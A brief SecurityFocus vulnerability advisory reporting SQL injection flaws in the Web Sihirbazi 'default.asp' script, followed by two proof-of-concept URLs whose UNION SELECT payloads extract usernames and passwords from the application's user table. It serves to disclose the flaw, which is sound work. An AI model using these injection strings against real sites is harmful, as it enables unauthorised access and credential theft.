Web Sihirbazi 'default.asp' Multiple SQL Injection Vulnerabilities

Attackers may exploit these issues through a browser.

The following proof-of-concept URIs are available:

http://www.example.com/[script_path]/default.asp?page=news&id=-2+union+all+select+0,kullaniciadi,sifre,3+from+user http://www.example.com/[script_path]/default.asp?pageid=-7+union+all+select+0,1,2,kullaniciadi,sifre,5+from+user


 

Privacy Statement
Copyright 2010, SecurityFocus